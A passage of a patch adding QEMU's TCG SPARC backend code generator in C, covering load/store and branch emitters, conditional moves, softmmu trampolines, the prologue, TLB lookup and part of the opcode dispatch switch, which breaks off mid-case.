tcg_out_ldst(s, ret, arg1, arg2, (type == TCG_TYPE_I32 ? LDUW : LDX)); +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + tcg_out_ldst(s, arg, arg1, arg2, (type == TCG_TYPE_I32 ? STW : STX)); +} + +static void tcg_out_ld_ptr(TCGContext *s, TCGReg ret, uintptr_t arg) +{ + tcg_out_movi(s, TCG_TYPE_PTR, ret, arg & ~0x3ff); + tcg_out_ld(s, TCG_TYPE_PTR, ret, ret, arg & 0x3ff); +} + +static inline void tcg_out_sety(TCGContext *s, TCGReg rs) +{ + tcg_out32(s, WRY | INSN_RS1(TCG_REG_G0) | INSN_RS2(rs)); +} + +static inline void tcg_out_rdy(TCGContext *s, TCGReg rd) +{ + tcg_out32(s, RDY | INSN_RD(rd)); +} + +static void tcg_out_div32(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t val2, int val2const, int uns) +{ + /* Load Y with the sign/zero extension of RS1 to 64-bits. */ + if (uns) { + tcg_out_sety(s, TCG_REG_G0); + } else { + tcg_out_arithi(s, TCG_REG_T1, rs1, 31, SHIFT_SRA); + tcg_out_sety(s, TCG_REG_T1); + } + + tcg_out_arithc(s, rd, rs1, val2, val2const, + uns ? ARITH_UDIV : ARITH_SDIV); +} + +static inline void tcg_out_nop(TCGContext *s) +{ + tcg_out_sethi(s, TCG_REG_G0, 0); +} + +static const uint8_t tcg_cond_to_bcond[] = { + [TCG_COND_EQ] = COND_E, + [TCG_COND_NE] = COND_NE, + [TCG_COND_LT] = COND_L, + [TCG_COND_GE] = COND_GE, + [TCG_COND_LE] = COND_LE, + [TCG_COND_GT] = COND_G, + [TCG_COND_LTU] = COND_CS, + [TCG_COND_GEU] = COND_CC, + [TCG_COND_LEU] = COND_LEU, + [TCG_COND_GTU] = COND_GU, +}; + +static const uint8_t tcg_cond_to_rcond[] = { + [TCG_COND_EQ] = RCOND_Z, + [TCG_COND_NE] = RCOND_NZ, + [TCG_COND_LT] = RCOND_LZ, + [TCG_COND_GT] = RCOND_GZ, + [TCG_COND_LE] = RCOND_LEZ, + [TCG_COND_GE] = RCOND_GEZ +}; + +static void tcg_out_bpcc0(TCGContext *s, int scond, int flags, int off19) +{ + tcg_out32(s, INSN_OP(0) | INSN_OP2(1) | INSN_COND(scond) | flags | off19); +} + +static void tcg_out_bpcc(TCGContext *s, int scond, int flags, int label) +{ + TCGLabel *l = &s->labels[label]; + int off19; + + if (l->has_value) { + off19 = INSN_OFF19(tcg_pcrel_diff(s, l->u.value_ptr)); + } else { + /* Make sure to preserve destinations during retranslation. */ + off19 = *s->code_ptr & INSN_OFF19(-1); + tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP19, label, 0); + } + tcg_out_bpcc0(s, scond, flags, off19); +} + +static void tcg_out_cmp(TCGContext *s, TCGReg c1, int32_t c2, int c2const) +{ + tcg_out_arithc(s, TCG_REG_G0, c1, c2, c2const, ARITH_SUBCC); +} + +static void tcg_out_brcond_i32(TCGContext *s, TCGCond cond, TCGReg arg1, + int32_t arg2, int const_arg2, int label) +{ + tcg_out_cmp(s, arg1, arg2, const_arg2); + tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_ICC | BPCC_PT, label); + tcg_out_nop(s); +} + +static void tcg_out_movcc(TCGContext *s, TCGCond cond, int cc, TCGReg ret, + int32_t v1, int v1const) +{ + tcg_out32(s, ARITH_MOVCC | cc | INSN_RD(ret) + | INSN_RS1(tcg_cond_to_bcond[cond]) + | (v1const ? INSN_IMM11(v1) : INSN_RS2(v1))); +} + +static void tcg_out_movcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const, + int32_t v1, int v1const) +{ + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movcc(s, cond, MOVCC_ICC, ret, v1, v1const); +} + +static void tcg_out_brcond_i64(TCGContext *s, TCGCond cond, TCGReg arg1, + int32_t arg2, int const_arg2, int label) +{ + /* For 64-bit signed comparisons vs zero, we can avoid the compare. */ + if (arg2 == 0 && !is_unsigned_cond(cond)) { + TCGLabel *l = &s->labels[label]; + int off16; + + if (l->has_value) { + off16 = INSN_OFF16(tcg_pcrel_diff(s, l->u.value_ptr)); + } else { + /* Make sure to preserve destinations during retranslation. */ + off16 = *s->code_ptr & INSN_OFF16(-1); + tcg_out_reloc(s, s->code_ptr, R_SPARC_WDISP16, label, 0); + } + tcg_out32(s, INSN_OP(0) | INSN_OP2(3) | BPR_PT | INSN_RS1(arg1) + | INSN_COND(tcg_cond_to_rcond[cond]) | off16); + } else { + tcg_out_cmp(s, arg1, arg2, const_arg2); + tcg_out_bpcc(s, tcg_cond_to_bcond[cond], BPCC_XCC | BPCC_PT, label); + } + tcg_out_nop(s); +} + +static void tcg_out_movr(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, + int32_t v1, int v1const) +{ + tcg_out32(s, ARITH_MOVR | INSN_RD(ret) | INSN_RS1(c1) + | (tcg_cond_to_rcond[cond] << 10) + | (v1const ? INSN_IMM10(v1) : INSN_RS2(v1))); +} + +static void tcg_out_movcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const, + int32_t v1, int v1const) +{ + /* For 64-bit signed comparisons vs zero, we can avoid the compare. + Note that the immediate range is one bit smaller, so we must check + for that as well. */ + if (c2 == 0 && !is_unsigned_cond(cond) + && (!v1const || check_fit_i32(v1, 10))) { + tcg_out_movr(s, cond, ret, c1, v1, v1const); + } else { + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movcc(s, cond, MOVCC_XCC, ret, v1, v1const); + } +} + +static void tcg_out_setcond_i32(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const) +{ + /* For 32-bit comparisons, we can play games with ADDC/SUBC. */ + switch (cond) { + case TCG_COND_LTU: + case TCG_COND_GEU: + /* The result of the comparison is in the carry bit. */ + break; + + case TCG_COND_EQ: + case TCG_COND_NE: + /* For equality, we can transform to inequality vs zero. */ + if (c2 != 0) { + tcg_out_arithc(s, TCG_REG_T1, c1, c2, c2const, ARITH_XOR); + c2 = TCG_REG_T1; + } else { + c2 = c1; + } + c1 = TCG_REG_G0, c2const = 0; + cond = (cond == TCG_COND_EQ ? TCG_COND_GEU : TCG_COND_LTU); + break; + + case TCG_COND_GTU: + case TCG_COND_LEU: + /* If we don't need to load a constant into a register, we can + swap the operands on GTU/LEU. There's no benefit to loading + the constant into a temporary register. */ + if (!c2const || c2 == 0) { + TCGReg t = c1; + c1 = c2; + c2 = t; + c2const = 0; + cond = tcg_swap_cond(cond); + break; + } + /* FALLTHRU */ + + default: + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movcc(s, cond, MOVCC_ICC, ret, 1, 1); + return; + } + + tcg_out_cmp(s, c1, c2, c2const); + if (cond == TCG_COND_LTU) { + tcg_out_arithi(s, ret, TCG_REG_G0, 0, ARITH_ADDC); + } else { + tcg_out_arithi(s, ret, TCG_REG_G0, -1, ARITH_SUBC); + } +} + +static void tcg_out_setcond_i64(TCGContext *s, TCGCond cond, TCGReg ret, + TCGReg c1, int32_t c2, int c2const) +{ + if (use_vis3_instructions) { + switch (cond) { + case TCG_COND_NE: + if (c2 != 0) { + break; + } + c2 = c1, c2const = 0, c1 = TCG_REG_G0; + /* FALLTHRU */ + case TCG_COND_LTU: + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_arith(s, ret, TCG_REG_G0, TCG_REG_G0, ARITH_ADDXC); + return; + default: + break; + } + } + + /* For 64-bit signed comparisons vs zero, we can avoid the compare + if the input does not overlap the output. */ + if (c2 == 0 && !is_unsigned_cond(cond) && c1 != ret) { + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movr(s, cond, ret, c1, 1, 1); + } else { + tcg_out_cmp(s, c1, c2, c2const); + tcg_out_movi_imm13(s, ret, 0); + tcg_out_movcc(s, cond, MOVCC_XCC, ret, 1, 1); + } +} + +static void tcg_out_addsub2_i32(TCGContext *s, TCGReg rl, TCGReg rh, + TCGReg al, TCGReg ah, int32_t bl, int blconst, + int32_t bh, int bhconst, int opl, int oph) +{ + TCGReg tmp = TCG_REG_T1; + + /* Note that the low parts are fully consumed before tmp is set. */ + if (rl != ah && (bhconst || rl != bh)) { + tmp = rl; + } + + tcg_out_arithc(s, tmp, al, bl, blconst, opl); + tcg_out_arithc(s, rh, ah, bh, bhconst, oph); + tcg_out_mov(s, TCG_TYPE_I32, rl, tmp); +} + +static void tcg_out_addsub2_i64(TCGContext *s, TCGReg rl, TCGReg rh, + TCGReg al, TCGReg ah, int32_t bl, int blconst, + int32_t bh, int bhconst, bool is_sub) +{ + TCGReg tmp = TCG_REG_T1; + + /* Note that the low parts are fully consumed before tmp is set. */ + if (rl != ah && (bhconst || rl != bh)) { + tmp = rl; + } + + tcg_out_arithc(s, tmp, al, bl, blconst, is_sub ? ARITH_SUBCC : ARITH_ADDCC); + + if (use_vis3_instructions && !is_sub) { + /* Note that ADDXC doesn't accept immediates. */ + if (bhconst && bh != 0) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh); + bh = TCG_REG_T2; + } + tcg_out_arith(s, rh, ah, bh, ARITH_ADDXC); + } else if (bh == TCG_REG_G0) { + /* If we have a zero, we can perform the operation in two insns, + with the arithmetic first, and a conditional move into place. */ + if (rh == ah) { + tcg_out_arithi(s, TCG_REG_T2, ah, 1, + is_sub ? ARITH_SUB : ARITH_ADD); + tcg_out_movcc(s, TCG_COND_LTU, MOVCC_XCC, rh, TCG_REG_T2, 0); + } else { + tcg_out_arithi(s, rh, ah, 1, is_sub ? ARITH_SUB : ARITH_ADD); + tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, rh, ah, 0); + } + } else { + /* Otherwise adjust BH as if there is carry into T2 ... */ + if (bhconst) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_T2, bh + (is_sub ? -1 : 1)); + } else { + tcg_out_arithi(s, TCG_REG_T2, bh, 1, + is_sub ? ARITH_SUB : ARITH_ADD); + } + /* ... smoosh T2 back to original BH if carry is clear ... */ + tcg_out_movcc(s, TCG_COND_GEU, MOVCC_XCC, TCG_REG_T2, bh, bhconst); + /* ... and finally perform the arithmetic with the new operand. */ + tcg_out_arith(s, rh, ah, TCG_REG_T2, is_sub ? ARITH_SUB : ARITH_ADD); + } + + tcg_out_mov(s, TCG_TYPE_I64, rl, tmp); +} + +static void tcg_out_call_nodelay(TCGContext *s, tcg_insn_unit *dest) +{ + ptrdiff_t disp = tcg_pcrel_diff(s, dest); + + if (disp == (int32_t)disp) { + tcg_out32(s, CALL | (uint32_t)disp >> 2); + } else { + uintptr_t desti = (uintptr_t)dest; + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, desti & ~0xfff); + tcg_out_arithi(s, TCG_REG_O7, TCG_REG_T1, desti & 0xfff, JMPL); + } +} + +static void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) +{ + tcg_out_call_nodelay(s, dest); + tcg_out_nop(s); +} + +#ifdef CONFIG_SOFTMMU +static tcg_insn_unit *qemu_ld_trampoline[16]; +static tcg_insn_unit *qemu_st_trampoline[16]; + +static void build_trampolines(TCGContext *s) +{ + static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_SB] = helper_ret_ldsb_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LESW] = helper_le_ldsw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BESW] = helper_be_ldsw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, + }; + static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, + }; + + int i; + TCGReg ra; + + for (i = 0; i < 16; ++i) { + if (qemu_ld_helpers[i] == NULL) { + continue; + } + + /* May as well align the trampoline. */ + while ((uintptr_t)s->code_ptr & 15) { + tcg_out_nop(s); + } + qemu_ld_trampoline[i] = s->code_ptr; + + if (SPARC64 || TARGET_LONG_BITS == 32) { + ra = TCG_REG_O3; + } else { + /* Install the high part of the address. */ + tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O2, 32, SHIFT_SRLX); + ra = TCG_REG_O4; + } + + /* Set the retaddr operand. */ + tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); + /* Set the env operand. */ + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); + /* Tail call. */ + tcg_out_call_nodelay(s, qemu_ld_helpers[i]); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); + } + + for (i = 0; i < 16; ++i) { + if (qemu_st_helpers[i] == NULL) { + continue; + } + + /* May as well align the trampoline. */ + while ((uintptr_t)s->code_ptr & 15) { + tcg_out_nop(s); + } + qemu_st_trampoline[i] = s->code_ptr; + + if (SPARC64) { + ra = TCG_REG_O4; + } else { + ra = TCG_REG_O1; + if (TARGET_LONG_BITS == 64) { + /* Install the high part of the address. */ + tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); + ra += 2; + } else { + ra += 1; + } + if ((i & MO_SIZE) == MO_64) { + /* Install the high part of the data. */ + tcg_out_arithi(s, ra, ra + 1, 32, SHIFT_SRLX); + ra += 2; + } else { + ra += 1; + } + /* Skip the mem_index argument. */ + ra += 1; + } + + /* Set the retaddr operand. */ + if (ra >= TCG_REG_O6) { + tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_O7, TCG_REG_CALL_STACK, + TCG_TARGET_CALL_STACK_OFFSET); + ra = TCG_REG_G1; + } + tcg_out_mov(s, TCG_TYPE_PTR, ra, TCG_REG_O7); + /* Set the env operand. */ + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O0, TCG_AREG0); + /* Tail call. */ + tcg_out_call_nodelay(s, qemu_st_helpers[i]); + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_O7, ra); + } +} +#endif + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int tmp_buf_size, frame_size; + + /* The TCG temp buffer is at the top of the frame, immediately + below the frame pointer. */ + tmp_buf_size = CPU_TEMP_BUF_NLONGS * (int)sizeof(long); + tcg_set_frame(s, TCG_REG_I6, TCG_TARGET_STACK_BIAS - tmp_buf_size, + tmp_buf_size); + + /* TCG_TARGET_CALL_STACK_OFFSET includes the stack bias, but is + otherwise the minimal frame usable by callees. */ + frame_size = TCG_TARGET_CALL_STACK_OFFSET - TCG_TARGET_STACK_BIAS; + frame_size += TCG_STATIC_CALL_ARGS_SIZE + tmp_buf_size; + frame_size += TCG_TARGET_STACK_ALIGN - 1; + frame_size &= -TCG_TARGET_STACK_ALIGN; + tcg_out32(s, SAVE | INSN_RD(TCG_REG_O6) | INSN_RS1(TCG_REG_O6) | + INSN_IMM13(-frame_size)); + +#ifdef CONFIG_USE_GUEST_BASE + if (GUEST_BASE != 0) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } +#endif + + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I1, 0, JMPL); + /* delay slot */ + tcg_out_nop(s); + + /* No epilogue required. We issue ret + restore directly in the TB. */ + +#ifdef CONFIG_SOFTMMU + build_trampolines(s); +#endif +} + +#if defined(CONFIG_SOFTMMU) +/* Perform the TLB load and compare. + + Inputs: + ADDRLO and ADDRHI contain the possible two parts of the address. + + MEM_INDEX and S_BITS are the memory context and log2 size of the load. + + WHICH is the offset into the CPUTLBEntry structure of the slot to read. + This should be offsetof addr_read or addr_write. + + The result of the TLB comparison is in %[ix]cc. The sanitized address + is in the returned register, maybe %o0. The TLB addend is in %o1. */ + +static TCGReg tcg_out_tlb_load(TCGContext *s, TCGReg addr, int mem_index, + TCGMemOp s_bits, int which) +{ + const TCGReg r0 = TCG_REG_O0; + const TCGReg r1 = TCG_REG_O1; + const TCGReg r2 = TCG_REG_O2; + int tlb_ofs; + + /* Shift the page number down. */ + tcg_out_arithi(s, r1, addr, TARGET_PAGE_BITS, SHIFT_SRL); + + /* Mask out the page offset, except for the required alignment. */ + tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_T1, + TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + + /* Mask the tlb index. */ + tcg_out_arithi(s, r1, r1, CPU_TLB_SIZE - 1, ARITH_AND); + + /* Mask page, part 2. */ + tcg_out_arith(s, r0, addr, TCG_REG_T1, ARITH_AND); + + /* Shift the tlb index into place. */ + tcg_out_arithi(s, r1, r1, CPU_TLB_ENTRY_BITS, SHIFT_SLL); + + /* Relative to the current ENV. */ + tcg_out_arith(s, r1, TCG_AREG0, r1, ARITH_ADD); + + /* Find a base address that can load both tlb comparator and addend. */ + tlb_ofs = offsetof(CPUArchState, tlb_table[mem_index][0]); + if (!check_fit_ptr(tlb_ofs + sizeof(CPUTLBEntry), 13)) { + if (tlb_ofs & ~0x3ff) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T1, tlb_ofs & ~0x3ff); + tcg_out_arith(s, r1, r1, TCG_REG_T1, ARITH_ADD); + } + tlb_ofs &= 0x3ff; + } + + /* Load the tlb comparator and the addend. */ + tcg_out_ld(s, TCG_TYPE_TL, r2, r1, tlb_ofs + which); + tcg_out_ld(s, TCG_TYPE_PTR, r1, r1, tlb_ofs+offsetof(CPUTLBEntry, addend)); + + /* subcc arg0, arg2, %g0 */ + tcg_out_cmp(s, r0, r2, 0); + + /* If the guest address must be zero-extended, do so now. */ + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, r0, addr, 0, SHIFT_SRL); + return r0; + } + return addr; +} +#endif /* CONFIG_SOFTMMU */ + +static const int qemu_ld_opc[16] = { + [MO_UB] = LDUB, + [MO_SB] = LDSB, + + [MO_BEUW] = LDUH, + [MO_BESW] = LDSH, + [MO_BEUL] = LDUW, + [MO_BESL] = LDSW, + [MO_BEQ] = LDX, + + [MO_LEUW] = LDUH_LE, + [MO_LESW] = LDSH_LE, + [MO_LEUL] = LDUW_LE, + [MO_LESL] = LDSW_LE, + [MO_LEQ] = LDX_LE, +}; + +static const int qemu_st_opc[16] = { + [MO_UB] = STB, + + [MO_BEUW] = STH, + [MO_BEUL] = STW, + [MO_BEQ] = STX, + + [MO_LEUW] = STH_LE, + [MO_LEUL] = STW_LE, + [MO_LEQ] = STX_LE, +}; + +static void tcg_out_qemu_ld(TCGContext *s, TCGReg data, TCGReg addr, + TCGMemOp memop, int memi, bool is_64) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + TCGReg addrz, param; + tcg_insn_unit *func; + tcg_insn_unit *label_ptr; + + addrz = tcg_out_tlb_load(s, addr, memi, s_bits, + offsetof(CPUTLBEntry, addr_read)); + + /* The fast path is exactly one insn. Thus we can perform the + entire TLB Hit in the (annulled) delay slot of the branch + over the TLB Miss case. */ + + /* beq,a,pt %[xi]cc, label0 */ + label_ptr = s->code_ptr; + tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT + | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); + /* delay slot */ + tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_ld_opc[memop]); + + /* TLB Miss. */ + + param = TCG_REG_O1; + if (!SPARC64 && TARGET_LONG_BITS == 64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, addr); + + /* We use the helpers to extend SB and SW data, leaving the case + of SL needing explicit extending below. */ + if ((memop & ~MO_BSWAP) == MO_SL) { + func = qemu_ld_trampoline[memop & ~MO_SIGN]; + } else { + func = qemu_ld_trampoline[memop]; + } + assert(func != NULL); + tcg_out_call_nodelay(s, func); + /* delay slot */ + tcg_out_movi(s, TCG_TYPE_I32, param, memi); + + /* Recall that all of the helpers return 64-bit results. + Which complicates things for sparcv8plus. */ + if (SPARC64) { + /* We let the helper sign-extend SB and SW, but leave SL for here. */ + if (is_64 && (memop & ~MO_BSWAP) == MO_SL) { + tcg_out_arithi(s, data, TCG_REG_O0, 0, SHIFT_SRA); + } else { + tcg_out_mov(s, TCG_TYPE_REG, data, TCG_REG_O0); + } + } else { + if (s_bits == MO_64) { + tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, 32, SHIFT_SLLX); + tcg_out_arithi(s, TCG_REG_O1, TCG_REG_O1, 0, SHIFT_SRL); + tcg_out_arith(s, data, TCG_REG_O0, TCG_REG_O1, ARITH_OR); + } else if (is_64) { + /* Re-extend from 32-bit rather than reassembling when we + know the high register must be an extension. */ + tcg_out_arithi(s, data, TCG_REG_O1, 0, + memop & MO_SIGN ? SHIFT_SRA : SHIFT_SRL); + } else { + tcg_out_mov(s, TCG_TYPE_I32, data, TCG_REG_O1); + } + } + + *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); +#else + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); + addr = TCG_REG_T1; + } + tcg_out_ldst_rr(s, data, addr, + (GUEST_BASE ? TCG_GUEST_BASE_REG : TCG_REG_G0), + qemu_ld_opc[memop]); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_qemu_st(TCGContext *s, TCGReg data, TCGReg addr, + TCGMemOp memop, int memi) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + TCGReg addrz, param; + tcg_insn_unit *func; + tcg_insn_unit *label_ptr; + + addrz = tcg_out_tlb_load(s, addr, memi, s_bits, + offsetof(CPUTLBEntry, addr_write)); + + /* The fast path is exactly one insn. Thus we can perform the entire + TLB Hit in the (annulled) delay slot of the branch over TLB Miss. */ + /* beq,a,pt %[xi]cc, label0 */ + label_ptr = s->code_ptr; + tcg_out_bpcc0(s, COND_E, BPCC_A | BPCC_PT + | (TARGET_LONG_BITS == 64 ? BPCC_XCC : BPCC_ICC), 0); + /* delay slot */ + tcg_out_ldst_rr(s, data, addrz, TCG_REG_O1, qemu_st_opc[memop]); + + /* TLB Miss. */ + + param = TCG_REG_O1; + if (!SPARC64 && TARGET_LONG_BITS == 64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, addr); + if (!SPARC64 && s_bits == MO_64) { + /* Skip the high-part; we'll perform the extract in the trampoline. */ + param++; + } + tcg_out_mov(s, TCG_TYPE_REG, param++, data); + + func = qemu_st_trampoline[memop]; + assert(func != NULL); + tcg_out_call_nodelay(s, func); + /* delay slot */ + tcg_out_movi(s, TCG_TYPE_REG, param, memi); + + *label_ptr |= INSN_OFF19(tcg_ptr_byte_diff(s->code_ptr, label_ptr)); +#else + if (SPARC64 && TARGET_LONG_BITS == 32) { + tcg_out_arithi(s, TCG_REG_T1, addr, 0, SHIFT_SRL); + addr = TCG_REG_T1; + } + tcg_out_ldst_rr(s, data, addr, + (GUEST_BASE ? TCG_GUEST_BASE_REG : TCG_REG_G0), + qemu_st_opc[memop]); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg args[TCG_MAX_OP_ARGS], + const int const_args[TCG_MAX_OP_ARGS]) +{ + TCGArg a0, a1, a2; + int c, c2; + + /* Hoist the loads of the most common arguments. */ + a0 = args[0]; + a1 = args[1]; + a2 = args[2]; + c2 = const_args[2]; + + switch (opc) { + case INDEX_op_exit_tb: + if (check_fit_ptr(a0, 13)) { + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); + tcg_out_movi_imm13(s, TCG_REG_O0, a0); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_I0, a0 & ~0x3ff); + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_I7, 8, RETURN); + tcg_out_arithi(s, TCG_REG_O0, TCG_REG_O0, a0 & 0x3ff, ARITH_OR); + } + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* direct jump method */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* Make sure to preserve links during retranslation. */ + tcg_out32(s, CALL | (*s->code_ptr & ~INSN_OP(-1))); + } else { + /* indirect jump method */ + tcg_out_ld_ptr(s, TCG_REG_T1, (uintptr_t)(s->tb_next + a0)); + tcg_out_arithi(s, TCG_REG_G0, TCG_REG_T1, 0, JMPL); + } + tcg_out_nop(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + case INDEX_op_br: + tcg_out_bpcc(s, COND_A, BPCC_PT, a0); + tcg_out_nop(s); + break; + +#define OP_32_64(x) \ + glue(glue(case INDEX_op_, x), _i32): \ + glue(glue(case INDEX_op_, x), _i64) + + OP_32_64(ld8u): + tcg_out_ldst(s, a0, a1, a2, LDUB); + break; + OP_32_64(ld8s): + tcg_out_ldst(s, a0, a1, a2, LDSB); + break; + OP_32_64(ld16u): + tcg_out_ldst(s, a0, a1, a2, LDUH); + break; + OP_32_64(ld16s): + tcg_out_ldst(s, a0, a1, a2, LDSH); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ldst(s, a0, a1, a2, LDUW); + break; + OP_32_64(st8): + tcg_out_ldst(s, a0, a1, a2, STB); + break; + OP_32_64(st16): + tcg_out_ldst(s, a0, a1, a2, STH); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_ldst(s, a0, a1, a2, STW); + break; + OP_32_64(add): + c = ARITH_ADD; + goto gen_arith; + OP_32_64(sub): + c = ARITH_SUB; + goto gen_arith; + OP_32_64(and): + c = ARITH_AND; + goto gen_arith; + OP_32_64(andc): + c = ARITH_ANDN; + goto gen_arith; + OP_32_64(or): + c = ARITH_OR; + goto gen_arith; + OP_32_64(orc): + c = ARITH_ORN; + goto gen_arith; + OP_32_64(xor): + c = ARITH_XOR; + goto gen_arith; + case INDEX_op_shl_i32: + c = SHIFT_SLL; + do_shift32: + /* Limit immediate shift count lest we create an illegal insn. */ + tcg_out_arithc(s, a0, a1, a2 & 31, c2, c); + break; + case INDEX_op_shr_i32: + c = SHIFT_SRL; + goto do_shift32; + case INDEX_op_sar_i32: + c = SHIFT_SRA; + goto do_shift32; + case INDEX_op_mul_i32: + c = ARITH_UMUL; + goto gen_arith; + + OP_32_64(neg): + c = ARITH_SUB; + goto gen_arith1; + OP_32_64(not): + c = ARITH_ORN; + goto gen_arith1; + + case INDEX_op_div_i32: + tcg_out_div32(s, a0, a1, a2, c2, 0); + break; + case INDEX_op_divu_i32: + tcg_out_div32(s, a0, a1, a2, c2, 1); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond_i32(s, a2, a0, a1, const_args[1], args[3]); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond_i32(s, args[3], a0, a1, a2, c2); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond_i32(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], + args[4], const_args[4], args[5], const_args[5], + ARITH_ADDCC, ARITH_ADDC); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2_i32(s, args[0], args[1], args[2], args[3], + args[4], const_args[4], args[5], const_args[5], + ARITH_SUBCC, ARITH_SUBC); + break; + case INDEX_op_mulu2_i32: + c = ARITH_UMUL; + goto do_mul2; + case INDEX_op_muls2_i32: + c = ARITH_SMUL; + do_mul2: + /* The 32-bit multiply insns produce a full 64-bit result. If the + destination register can hold it, we can avoid the slower RDY. */ + tcg_out_arithc(s, a0, a2, args[3], const_args[3], c); + if (SPARC64 || a0 <= TCG_REG_O7) { + tcg_out_arithi(s, a1, a0, 32, SHIFT_SRLX); + } else { + tcg_out_rdy(s, a1); + } + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, a0, a1, a2, args[3], false); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, a0, a1, a2, args[3], true); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, a0, a1, a2, args[3]); + break; + + case INDEX_op_ld32s_i64: + tcg_out_ldst(s, a0, a1, a2, LDSW); + break; + case INDEX_op_ld_i64: + tcg_out_ldst(s, a0, a1, a2, LDX); + break; + case INDEX_op_st_i64: + tcg_out_ldst(s, a0, a1, a2, STX); + break; + case INDEX_op_shl_i64: + c = SHIFT_SLLX; + do_shift64: + /* Limit immediate shift count lest we create an illegal insn. */ + tcg_out_arithc(s, a0, a1, a2 & 63, c2, c); + break; + case INDEX_op_shr_i64: + c = SHIFT_SRLX; + goto do_shift64; + case INDEX_op_sar_i64: + c = SHIFT_SRAX; + goto do_shift64; + case INDEX_op_mul_i64: + c = ARITH_MULX; + goto gen_arith; + case INDEX_op_div_i64: + c = ARITH_SDIVX; + goto gen_arith; + case INDEX_op_divu_i64: + c = ARITH_UDIVX; + goto gen_arith; + case INDEX_op_ext32s_i64: + tcg_out_arithi(s, a0, a1, 0, SHIFT_SRA); + break; + case 